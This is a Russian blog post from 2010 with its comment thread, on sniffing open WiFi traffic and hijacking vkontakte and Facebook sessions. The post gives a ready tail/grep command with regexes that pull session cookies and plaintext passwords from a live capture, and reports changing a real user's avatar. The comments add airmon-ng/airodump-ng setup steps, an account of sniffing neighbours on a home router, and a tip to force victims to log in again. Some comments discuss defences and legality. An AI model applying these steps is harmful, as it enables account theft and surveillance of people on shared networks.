Пользователь
0,0
рейтинг
21 декабря 2010 в 00:23

Разработка → Перехват cookie в реальном времени в открытых WiFi-сетях



На видео показан угон сессии вконтакте.ру, который почему-то до сих пор не использует авторизацию с https и передает пароли открытым текстом.
Дамп трафика собирается программой kismac в формате libpcap и параллельно парсится grep-ом с использованием регулярных выражений, что позволяет в реальном времени выводить на экран все интересующие куки и пароли. При этом не используется никаких анализаторов пакетов.

regexp для перехвата вконтакте.ру:

tail -F pcap.файл | cat | grep -aEo «remixsid=[0-9a-f]+|l=[0-9]{3,12}|p=[0-9a-f]{36}|email=[^&]+&pass=[^ ]+»

для фейсбука:

c_user=[0-9]+|sid=[0-9]{1,5}|xs=[0-9a-f]{32}

Аналогичная конструкция будет работать и с дампом собранным с помощью airdump-ng.
Павел Жовнер @zhovner
карма
166,0
рейтинг 0,0
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Реклама

Самое читаемое Разработка

Комментарии (162)

  • –6
    А зачем было регексп писать?
    • +28
      Тут есть блог вконтакте, быть может это убедит их пересмотреть свою систему безопасности
      • –8
        Мне кажется статьи с видео было бы достаточно. Но да, так более радикально, если люди начнут баловаться с этим.
        А вы им отдельно об этой «фиче» не сообщали?
        • +7
          Можно подумать им это не известно, могли бы подсмотреть у фейсбука. Удручает еще то, что если руками зайти https://vkontakte.ru выдается 403
          • +10
            тем более им не в первой ;)
          • 0
            А как у фейсбука с этим борются?
            • 0
              У них используется https для передачи пароля
              • 0
                но сессия в куках ведь в открытую передается
                • –1
                  Да в открытую, но вы попробуйте ее угнать.
                  • +2
                    Я же поэтому и спрашиваю — каким образом защищаются?
                    • –1
                      Там используется несколько хешей которые на ходу изменяются
                    • +1
                      Прошу прощения, в фейсбуке всё так же просто, только там три куки вместо одной xs, c_user, sid. Единственное различие, что пароль передается через шифрованное соединение и если руками зайти на https://facebook.com то вся сессия будет зашифрована, чего нельзя сделать вконтакте.
                      • 0
                        Благодарю. Примерно так себе и представлял защиту FB. По их кукам, как я понял — всё так же уязвимо, но добавлены некоторые сложности в подмене перехваченных данных. И пользователям дается возможность без гемора сидеть под зашифрованым соединением. Верно?
                        • 0
                          пользователям дается возможность без гемора сидеть под зашифрованым соединением

                          Как всегда, есть нюансы. Не все работает по https. Как пример: чата нету. Так что без гемора не получится.
                    • 0
                  • 0
                    Ну как-то же firesheep ее угоняет.
              • +4
                фсб не одобряет использование https в России!
        • +2
          По моему после firesheep уже не стоит беспокоиться о таких сложных приёмах.
      • –6
        «Хакер обнаруживает, что дырки в солонках пропускают соль в обе стороны. И не только соль, а вообще всё, что угодно. Он пишет возмущенное письмо директору и ссыт во все солонки столовой.»
        • +4
          наглядный пример сравнения жопы с пальцем.
          • 0
            Да что вы говорите? Что в этом известном фельетоне про хакера, что в данном случае мотив «может это убедит сменить их систему безопасности» знаете чем является, по сути? Шантажом. Банальным шантажом. Пусть и не для собственной выгоды. Всё равно что выяснить, что кто-то не носит бронежилет, а потом написать об этом в газете и выдать всем в округе по пистолету.
          • +1
            А потом говорить: «Может быть, это заставит его носить бронежилет.»
        • НЛО прилетело и опубликовало эту надпись здесь
          • +1
            А вы мне возразите аргументировано. А то в карму мне тут гадят усиленно, а подкрепить свою позицию словами никто не осиливает.
            • НЛО прилетело и опубликовало эту надпись здесь
  • +20
    после смены фотографии я ждал, что покажут негодующее выражение лица жертвы
    • +14
      • +4
        Шаман!
      • +14
        Подружка наверно подговаривала, когда закрывала ноутбук ей: «Закрой просто ноут, а то он твой пароль увидит...»
      • 0
        можно в следующий раз «жертву» со стороны сфотографировать и наблюдать за реакцией
      • 0
        Они такие смешные. Со стороны.
      • +1
        Это особая — макдональдс магия…
  • НЛО прилетело и опубликовало эту надпись здесь
    • +8
      >разве от хабра нельзя также акк получить?

      Можно конечно.

      А еще тут можно получить бесплатно ssl-сертификат www.startssl.com
      • 0
        Да, только признают ли их сертификаты браузеры? Ато будет такая же фигня, как с самописными сертификатами. Смысл тогда в их бесплатности?
        • 0
          Все основные признают конечно.
        • 0
          попробуйте www.startssl.com/
        • +1

          Но для хабра бесплатно не дадут, только для частных лиц в персональных целях.
          • 0
            На такой случай сертификат от Godaddy за 13$ в год

            www.godaddy.com/Compare/gdcompare_ssl.aspx?isc=sslqgo015a
          • 0
            Да, работает. Только не во всех браузерах:
            Опера 11 — да
            Хром 8 — да
            Ослик 8 — да
            ФФ 3.6 — нет
            проверено на Win7

            Возникает вопрос — зависит ли от версии браузера эта проверка? Или они обращаются к какой-то своей базе во время проверки сертификата, которая постоянно обновляется?
            Ведь если так, то это очень хорошо, а если нет, то мы опять же начинаем получать геморой в виде пользователей на старых браузерах :(
            • 0
              База сертификатов содержится в браузере, обновляется только с выходом новых версий браузеров.

              в фф 3.6 — работает

    • 0
      Похулиганить — да. Получить акк — нет.
      • НЛО прилетело и опубликовало эту надпись здесь
        • +3
          Действительно. Пароль в форме посылается в открытом виде. Печально.
  • +6
    я уже давно в публичных местах поднимаю openvpn туннель на свой сервер и заворачиваю default в него.
    да доставляет некоторые неудобства, но безопасность превыше всего
    • 0
      делись туннелем )
    • НЛО прилетело и опубликовало эту надпись здесь
      • +10
        наверно
        но точно знаю, что девочка с habrahabr.ru/blogs/infosecurity/110387/#comment_3511715 не параноик

        а параноик, наверно потому, что приходится заходить на админки, которые управляют бизнесом на много-много денег
    • +1
      А у меня и дома все соединения завёрнуты в ssh-туннель до сервера в более другой стране, да. Кстати, так оно ещё и чуть ли не быстрее работает, чем без туннеля.
  • 0
    Интересно если в таких экстренных случаях заюзать оперу турбо. Поможет ли?
    • +2
      Нет. Отличие турбо-запроса только в том, что запрос отправляется не серверу вконтакте, а оперной проксе. Тоже открыто, тоже по 80-ому порту.
  • 0
    так и думал, что смена аватара будет на лыбящийся смайл )
  • +17
    у каждого кулхацкера обязан на харде храниться trollface.jpg
  • НЛО прилетело и опубликовало эту надпись здесь
    • 0
      Круто!
    • +5
      Машина выехала.
      • НЛО прилетело и опубликовало эту надпись здесь
      • –1
        К кому, владельцу точки? А смысл?
    • +1
      А ваше кунфу не работает с MAC-ом сетевой карты?
      • 0
        Нет, это только для точек доступа. Почитать можно тут.
        • 0
          Не только для точек доступа. Если вы создавали вай-фай сеть со своего компьютера и вас «запеленговал» телефон с гугл картами, то тоже окажитесь в этой базе.
          • 0
            Создавая вайфай сеть, вы, разумеется, не становитесь точкой доступа?
            • 0
              Понятно, что становлюсь.
              Это было разъяснение, что не только хардварные точки доступа пробиваются по маку, но и мак вашей сетевой карты тоже уже может быть в базе.
    • 0
      и определяем геоположение роутера?
      • НЛО прилетело и опубликовало эту надпись здесь
        • 0
          no dad, no!
        • 0
          так в том то и дело что адрес роутера в пределах я не знаю, региона, города, или даже страны, то есть это не физический адрес роутера, камеры не помогут
          • НЛО прилетело и опубликовало эту надпись здесь
            • +1
              Я могу упростить вам задачу и написать домашний адрес
              • НЛО прилетело и опубликовало эту надпись здесь
                • 0
                  Да, это макдональдс на дерибасовской
              • 0
                улица Пушкина
  • +8
    Спасибо за Massive Attack. Обычно подобные ролики сопровождает «унц-унц-унц».
  • +3
    А еще можно не делать WiFi точки без паролей, это же не безопасно. Все сайты и программы на шифрованные соединения все равно не перейдут.

    А пароль расклеить по столам…
    • 0
      Объяснить бы это в макдональдсах и подобных заведениях
      • 0
        если вам так важно «ощущение безопасности» ) пользуйтесь VPN
    • 0
      > Все сайты и программы на шифрованные соединения все равно не перейдут.

      Ну и зря.
    • 0
      > Все сайты и программы на шифрованные соединения все равно не перейдут.
      Зачем всем?
      Соц сетям было бы достаточно.
    • +2
      А еще можно не делать WiFi точки без паролей, это же не безопасно.

      От того, что WiFi будет закрыт на пароль, он не станет более безопасен для тех, кто в неё войдёт. Ключ общий для всех.
      • +2
        Это справедливо только для WEP шифрования, но вам не удастся прослушать WPA2+TKIP+AES даже имея ключ сети.
        • –1
          Ой ли? Дома, конечно, проверю, но предварительно — крайне сомневаюсь, если честно.
          Не говоря уж о том, что arp-spoofing, fake-AP и прочее никто не отменял. ;)
  • 0
    А драйвера для этого адаптера нужно ставить? у меня так и не получилось его через kismac запустить, отдельной утилитой реалтековской работает. а kismac ругается
    • 0
      Все драйвера идут в комплекте с kismac, нужно полностью удалить риалтековские драйвера и в кисмаке добавить драйвер для RTL8187L (он последний в списке). Правда тогда карту нельзя будет использовать для подключения.
      • 0
        ругается, говорит что драйвера загружены, но не удалось инициализировать
        попробую еще вечером потыкать
        • 0
          Обязательно нужно удалить драйвера риалтека из системы чтобы пропали устройства и списка сетевых интерфейсов. Удаляется оно из инсталятора на диске.

          В кисмаке выбирать драйвера тут img-kiev.fotki.yandex.ru/get/4312/abappel.0/0_4e3ed_6a70e554_orig
  • +16
    Опасайтесь людей с макбуком и камерой в Макдональдсах!
  • +5
    Ждём ответное видео в контакте: «Перехват cookie и угон сессии в реальном времени на примере Хабрахабра»: о)
  • 0
    Прикольно, как раз вчера заказал Alfa 1000mW 9dBi, как завтра дойдет — обязательно попробую… :)
    • +4
      С самими добрыми намерениями…
      • +6
  • +2
    Почему автор не показал на видео лицо того чувака, которому сменил аву? Я очень ждал этих кадров )
  • +1
    hotspotshield
    халява vpn и айпи чаще всего штатовский
  • –3
    ssh-туннель с доверенным сервером спасет хомячков.
    Жаль они не знают об этом.
  • 0
    строго говоря, Вас за это посадить могут)
    • 0
      Расскажите подробнее.

      Допустим у меня взломана почта, есть логи айпи-адресов с которых осуществлялся вход, есть история переписки явно указывающая на взломщика. Куда с этим идти? В районную милицию?
      • +1
        По идее, да, в районную. А они уже должны передать в отдел «К».
      • 0
        в РУВД. И если они работают не через жопу (а вероятность этого довольно высока), то это будет однозначно рассматриваться как уголовное дело. Посадить не посадят, конечно, за такое (выше я условно выразился уж), но судимость будет
        • 0
          Если найдут… тут очень тяжело сам факт доказать и за руку поймать. Фактически только если сам взломщик начнет в открытую хвалится результатами взлома.
          • +1
            Что и было сделано на видео
          • 0
            я говорил про «Допустим у меня взломана почта, есть логи айпи-адресов с которых осуществлялся вход, есть история переписки явно указывающая на взломщика.»
    • 0
      Почему? Вот вы кричите из окна: «Эээй, Ваня, заходи», например, а кто-то мимо проходил, и для этого кого-то это было новой информацией. Сеть-то ваша, открытая, трафик принадлежит вам, так что ничего противозаконного. Я так соседям объясняю и им нечего возразить.
      • +2
        Глупость какая. У Вас есть многоквартирный дом. Вы в поисках квартиры, которую собираетесь ограбить. Находите хиленькую деревянную дверь, за которой есть куча денег. Взломать её или выбить очень просто, однако это автоматически сделает Вас преступником. Даже если дверь открыта настежь, но явным образом не указано «берите что хотите», то в таком случае это уже будет расцениваться через призму уголовного кодекса.
        • –2
          Некорректно. Wi-Fi все же нужно сравнивать с голосом. Если кто-то будет за стенкой кричать: «Мой логин XXX, мой пароль YYY», вы сразу станете соучастником преступления, т.к. кричащий знал, что вы это слышали?
          • 0
            Есть такое понятие, как несанкционированный доступ.
          • 0
            Если Вы ими воспользуетесь — да, это будет уголовное преступление.
            Если просто услышите — никаких проблем. Человек с видео использовал полученные данные, это вход в открытую настежь дверь, это как незаконное проникновение на частную территорию. Он еще и сменил фото — причинение ущерба через несанкционированный доступ, это вообще до нескольких лет тюрьмы, если получится доказать что ущерб был существенным. В данном случае речь именно об уголовной ответственности.
          • +4
            да никто ничего не кричал. «Хакер» воспользовался уязвимостью другого сайта, сниферя сетку. Офигеть какое приглашение. Что как дети-то.
            P.S. Давайте тогда я к вам в квартиру залезу через крышу с помощью альпинистского снаряжения. Фигли вы на окошки решётки не поставили, хоть и на седьмом этаже живёте и почему у вас охраны дома нет? Предлагаю взлом через социнженерию тоже им не считать, ибо вроде как тоже «приглашение» есть. Я прям поражаюсь иногда таким людям.
            P.P.S. Я вас уверяю, это уголовно-наказуемое деяние
          • 0
            и да, если сравнивать с голосом, то это скорее разговор шёпотом, а вы подходите и подслушиваете пароли, а потом ими пользуетесь.
  • –2
    Нефортовая карма у ВКонтакте! Сейчас опять полетят помидоры :)
  • +6
    У меня на роутере стоит openwrt, и примонтирован раздел с компьютера через sshfs. Есть скрипт, который мигает светодиодом если кто-то к вайфаю подключен. Запускаем на роутере tcpdump в подмонтированную директорию и начинаем сниффить трафик. Больше, правда, одноклассники встречаются, нежели вконтакте, но таким способом уже со всеми соседями перезнакомился. Одни так вообще уже месяца два только моим вайфаем пользуются, и подключать проводной интернет, похоже, не торопятся.
    • 0
      Научите… интересная получится статья.
      • +3
        Я плохо статьи пишу, технарь я. Как собрать и поставить openwrt на dir-320 на хабре уже писали, собирать нужно с fuse и sshfs, чтоб установить tcpdump — opkg install tcpdump.
        Слушать трафик с помощью команды tcpdump -i wlan0 -s 0 -w ./dump.bin
        • 0
          собирать нужно с fuse и sshfs
          простите, а зачем? чтобы подключиться к другому линуховому серваку? так не проще уже nfs? а эффективнее будет использовать флешку.
          • 0
            Я и так использую флешку, но дамп пишу прямиком на компьютер. Можно и nfs использовать, ничего не имею против.
    • 0
      У вас менеджер пакетов называется ipkg? Посмотрите пожалуйста есть ли в репозиториях kismet
      • +1
        opkg.
        root@valrt:~# opkg list | grep kismet
        kismet-client — 2010-07-R1-1 — An 802.11 layer2 wireless network detector, sniffer, and intrusion
        This package contains the kismet text interface client.
        kismet-drone — 2010-07-R1-1 — An 802.11 layer2 wireless network detector, sniffer, and intrusion
        This package contains the kismet remote sniffing.and monitoring drone.
        kismet-server — 2010-07-R1-1 — An 802.11 layer2 wireless network detector, sniffer, and intrusion
        This package contains the kismet server.
    • 0
      ну и повесьте в подъезде объявление «все кто пользуется сетью ХАЛЯВАWIFI пиво заносить в квартиру номер #»
      • +3
        Не пью. И сеть называется Wife Eye, да.
        • +1
          ну тогда «шоколадки заносить в квартиру #»
  • +2
    При авторизации люди обычно ничего не делают, а вконтакт авторизовывается по кукам l и p, для домена login.vk.com. Они действуют не до конца сессии с одного ip, а с любого ip в любое время, пока не сменишь пароль. Перехватывать их лучше.
    Ну а в теории если дамп включен после авторизации, можно зайти под этой сессией, и сделать выход. Вероятно тогда жертву бросит на окно логина пароля, после чего уже и получим логин пароль в открытом виде.
    Я как то поискал по внутренним ресурсам провайдера на предмет «cookies.sqlite» (firefox куки). Нашел 43 файла. Из них в 24 были куки авторизации вконтакте.
    Для своей защиты поднял на домашней машине OpenVPN сервер через линукс и vmware server. Так то и не мешает, и работает не плохо.
    • +1
      Так как эти куки используются для логина с любого ip, то выход из вконтакта с вашей машины никак не отразится на пользователе. Ведь если вы на каком-нить компе нажмете «выход» из своей учетки вконтакта, авторизация на других все равно остается
    • 0
      Посмотрите внимательно регексп, там есть l и p и еще строка с логином-паролем.

      > можно зайти под этой сессией, и сделать выход. Вероятно тогда жертву бросит на окно логина

      Это не так, remixsid генерируется каждый раз при смене айпи из l+p+айпи, и если айпи не менялся, даже после выхода remixsid останется валидным. Чтобы заставить жертву ввести пароль можно послать сгенерированный пакет разлогинивающий его сессию. Такое умеет например виндовый commview
  • 0
    А где снималось, если не секрет?
    • +2
      в комментах же ссылку давали samy.pl/mapxss/?mac=00-02-CF-6B-5F-92 — по маку вычислили, что это Украина, Одесса, ул. Дерибасовская ;)
      • 0
        IT-пивная?
  • 0
    Для FireFox даже есть дополнение, перехватывающее и анализирующее cookie в реальном времени в открытых WiFi-сетях.
    codebutler.com/firesheep
    Проще уже просто быть не может.
    • 0
      вы сами его пробовали?
      • 0
        пробовали, работает.
        • 0
          Расскажите пожалуйста подробнее как она работает? Она подменяет arp? Ведь невозможно в винде без модификации драйверов перевести wifi карту в promiscuous mode, так же невозможно снифать трафик если карта подключена к точке доступа.
          • 0
            хм. могу только сказать, что пробовал на маке с картой, подключённой к открытой точке доступа. А почему бы не возможно?
            • 0
              Потому, что карта может слушать трафик только в пассивном режиме.
    • 0
      Не работает.
  • 0
    В следующем посте мы обсудим, что интересного можно найти в трафике, снятом airdump'ом.
    Хотя. Такая статья на Хабре уже была…
    Может прежде чем писать статьи уровня «вчера я узнал что есть интернет» хотя бы поиском пользоваться будем?
  • 0
    Если я правильно понял суть, то перехватить куки можно и в локальной сети, если нет VPN и стоят хабы?
    • 0
      хабы – это все же несколько редкость. ИМХО, на локалке проще делать mac spoofing и выдавать себя за гейтвей.
  • 0
    Скажите, пожалуйста, у вас pcap-дамп_файл бинарный или plain text?
    • 0
      Там в перемешку плейн текст, gzip-ованные страницы и бинарные данные. Для этого используется ключ -a в грепе
      • 0
        хм, у меня не пашет с airodump-ng, из plain text в дамп-файле у меня только имена сетей
        • 0
          Проверено, работает. Покажите как вы собираете дамп и как его открываете, можете даже сам дамп выложить
          • 0
            airodump-ng --write wifi_dump --output-format pcap eth1
            • 0
              airmon-ng wlan0 start

              airodump-ng -c канал -w file mon0

              grep -a Cookie file
  • 0
    airmon-ng не поднимается, видимо в этом причина (не поддерживается wifi сетевуха)

    ~# airmon-ng start eth1

    Interface Chipset Driver
    eth1 Intel 2200BG ipw2200 — [phy0]mon0: ОШИБКА при получении флагов интерфейса: Нет такого устройства

    (monitor mode enabled on mon0)
    • 0
      Вы точно уверены что eth это у вас wifi? Хотя оно говорит monitor mode enabled on mon0, попробуйте airodump-ng mon0
      • 0
        eth1 IEEE 802.11bg ESSID:off/any
        Mode:Managed Frequency:2.417 GHz Access Point: Not-Associated
        Bit Rate:0 kb/s Tx-Power=20 dBm Sensitivity=8/0
        Retry limit:7 RTS thr:off Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality:0 Signal level:0 Noise level:0
        Rx invalid nwid:0 Rx invalid crypt:5 Rx invalid frag:0
        Tx excessive retries:0 Invalid misc:0 Missed beacon:0

        ~# airmon-ng start eth1

        Interface Chipset Driver

        eth1 Intel 2200BG ipw2200 — [phy0]mon0: ОШИБКА при получении флагов интерфейса: Нет такого устройства

        (monitor mode enabled on mon0)

        ~# airodump-ng mon0
        Interface mon0:
        ioctl(SIOCGIFINDEX) failed: No such device

        — А вот когда запускаю так
        ~# airodump-ng --write wifi_dump --output-format pcap eth1

        дамп-файл создается, но там каша, причем в непонятной кодировке… ну и естественно она не парсится
        • 0
          — А вот когда запускаю так
          ~# airodump-ng --write wifi_dump --output-format pcap eth1


          Так запускать бесполезно, потому как для сбора дампа карта должна находится в promiscuous mode.

          На сайте aircrack-ng говорится что карта полностью поддерживается но нужно патчить драйвера:

          www.aircrack-ng.org/doku.php?id=ipw2200
          • 0
            да я понял, спс. Видел уже, буду ковырять дальше.
  • 0
    А если юзать удалённый сервак с поднятым SSH и через путти уже коннектиться на сервер и сидеть через проксю таким образом в сервисах а-ля кантакты и прочее. Угнать смогут ли подобными действиями?
    • 0
      думаю что нет, ибо внутри SSH туннеля все шифруется
  • –1
    Как все беспокоятся о том как бы сидеть во вконтактике в открытых сетях, чтобы не спалить пароль ))) Больше никаких других забот нет, товарищи?
    • +2
      Вкантактик это только для примера. Метод применим повсеместно.
  • 0
    Надо бы сделать скриптик для N900 для быстрого запуска этой фишки.
  • 0
    О… а у меня лежит пара гигов pcap траффика с нескольких IT конференций. Только я собирал под линуксом через aircrack-ng. Только все лень с ним что то делать.
  • 0
    Подскажите, пожалуйста, кто-нибудь, как запустить airodump-ng корректно на уже подключенном к сетке интерфейсе?
    А то у меня он вопит, что интерфейс используется. :(
    • +1
      Это невозможно.
      • 0
        Спасибо, так и думал. А чем можно наловить пакетов в .cap формате, к уже подключенной сети?
        kismac нет для моего телефона. :(
        • +1
          Ничем, снифать можно только отключившись от сети.

          У вас как я понял n900, там работает пакет aircrack-ng.

          airmon-ng wlan0
          airodump-ng -c канал интерфейс
          • 0
            Спасибо. Так и делаю.

            Видимо, к той точке просто никто не подключен. )
          • 0
            А как тогда работает wireshark?
            • 0
              Через WinPcap?
  • 0
    не хватает реакции парня.

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.